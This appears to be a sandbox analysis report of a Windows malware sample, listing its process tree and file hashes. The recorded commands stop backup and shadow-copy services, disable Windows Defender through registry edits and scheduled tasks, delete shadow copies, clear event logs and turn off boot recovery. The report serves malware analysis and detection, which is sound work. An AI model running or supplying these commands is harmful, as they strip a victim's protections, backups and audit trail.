sc.exe PID 2876 wrote to memory of 1388 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 2876 wrote to memory of 1388 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 2876 wrote to memory of 1428 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 2876 wrote to memory of 1428 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 2876 wrote to memory of 1836 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 2876 wrote to memory of 1836 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 2876 wrote to memory of 1848 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 2876 wrote to memory of 1848 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 2876 wrote to memory of 1948 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 2876 wrote to memory of 1948 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 2876 wrote to memory of 2240 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 2876 wrote to memory of 2240 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 2876 wrote to memory of 2896 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe reg.exe PID 2876 wrote to memory of 2896 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe reg.exe PID 2876 wrote to memory of 3096 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe reg.exe PID 2876 wrote to memory of 3096 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe reg.exe PID 2876 wrote to memory of 692 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe reg.exe PID 2876 wrote to memory of 692 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe reg.exe PID 2876 wrote to memory of 2220 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe reg.exe PID 2876 wrote to memory of 2220 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe reg.exe PID 2876 wrote to memory of 2116 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe reg.exe PID 2876 wrote to memory of 2116 2876 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe"C:\Users\Admin\AppData\Local\Temp\56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3824
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:3588
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1152
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:2452
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:3680
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:2772
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1492
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:608 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:716
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_1515a" /y2⤵
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_1515a" /y3⤵PID:788
-
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:3236
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:948
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1192
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1388
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:1428
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1836
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1848
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1948
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_1515a" start= disabled2⤵PID:2240
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2896
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3096
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:692
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:2220
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:2116
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3908
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1452
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:2172
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3776
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:3976
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:3988
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3528
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:60
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1084
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2000
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:644
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:2784
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:676
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:400
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:2708
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1200
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1332
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1132
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1408
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2252
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1968
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:4080
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2840
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3860
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1208
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3728
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2128
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2176
-
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1324
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3688
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:820
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1288
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:660
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:836
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:960
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1424
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:4040
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1916
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2208
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:696
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1584
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
c57ec04f1134fab4786810b1d776d202
SHA153f4389c35f8f6cd8c61742d2493aa63126259cc
SHA256c160bb93d9464a042de9c79d4b6ab7be980575fd22cbae718f1297d0dee69abe
SHA512c748cc385db95c21ff73f85f300ea36a56d71e95b60af3d49bd4ff15c82376e893a47a910836df329180ed80f91c1223669bfe87acefa2d02b73b2cedb6612b4